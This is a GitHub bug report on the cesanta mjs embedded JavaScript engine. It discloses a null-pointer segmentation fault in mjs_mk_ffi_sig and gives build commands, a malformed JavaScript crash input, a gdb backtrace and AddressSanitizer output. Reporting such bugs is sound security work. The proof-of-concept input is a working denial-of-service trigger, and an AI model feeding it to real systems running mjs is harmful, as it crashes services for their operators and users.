cesanta / mjs

Embedded JavaScript engine for C/C++
https://mongoose-os.com

Segmentation fault on mjs_mk_ffi_sig #288

Open CStriker opened 3 months ago

CStriker commented 3 months ago

The name of an affected Product

mjs

The affected version

Commit: b1b6eac (Tag: 2.20.0)

Description

An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_mk_ffi_sig function in the mjs.c file.

Vulnerability Type

Segmentation fault

Environment

Ubuntu 20.04

```
git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan
```

poc

```
let o = {
  a: 7111.1111,
    a: 7111.1111,
  foo: 1.1111,
  foo: ffi-= 44.1111,
  foofoo: 1.1111,
  foo: ffi-= 44.1111,
  foo: ffi('int)««««Ž«o: 1.«'),
};
```

run command

```
./mjs-asan -f poc
```

gdb info

```
Program received signal SIGSEGV, Segmentation fault.
0x0000555555589710 in mjs_mk_ffi_sig (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:9774
9774    MJS_PRIVATE mjs_val_t mjs_mk_ffi_sig(struct mjs *mjs) {
--Type <RET> for more, q to quit, c to continue without paging--
#0  0x0000555555589710 in mjs_mk_ffi_sig (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:9774
#1  0x0000555555583ffd in mjs_execute (mjs=0x615000000080, off=0, res=0x7fffffffd9f0) at mjs.c:8824
#2  0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_3", 
    src=0x60e000000120 " let o = {\n  a: 7111.1111,\n    a: 7111.1111,\n  foo: 1.1111,\n  foo: ffi-=\t44.1111,\n\t foofoo: 1.1111,\n  foo: ffi-=\t44.1111,\n\t foo: ffi('int)\001\253\253\253\253\216\253o: 1.\253'),\n};", generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044
#3  0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_3", res=0x7fffffffdb80) at mjs.c:9067
#4  0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406
```

address sanitizer info

```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1338032==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x555555589710 bp 0x7fffffffda10 sp 0x7fffffffd708 T0)
==1338032==The signal is caused by a READ memory access.
==1338032==Hint: address points to the zero page.
    #0 0x55555558970f in mjs_mk_ffi_sig /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9774
    #1 0x555555583ffc in mjs_execute /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:8824
    #2 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044
    #3 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067
    #4 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406
    #5 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308
    #6 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9774 in mjs_mk_ffi_sig
==1338032==ABORTING
```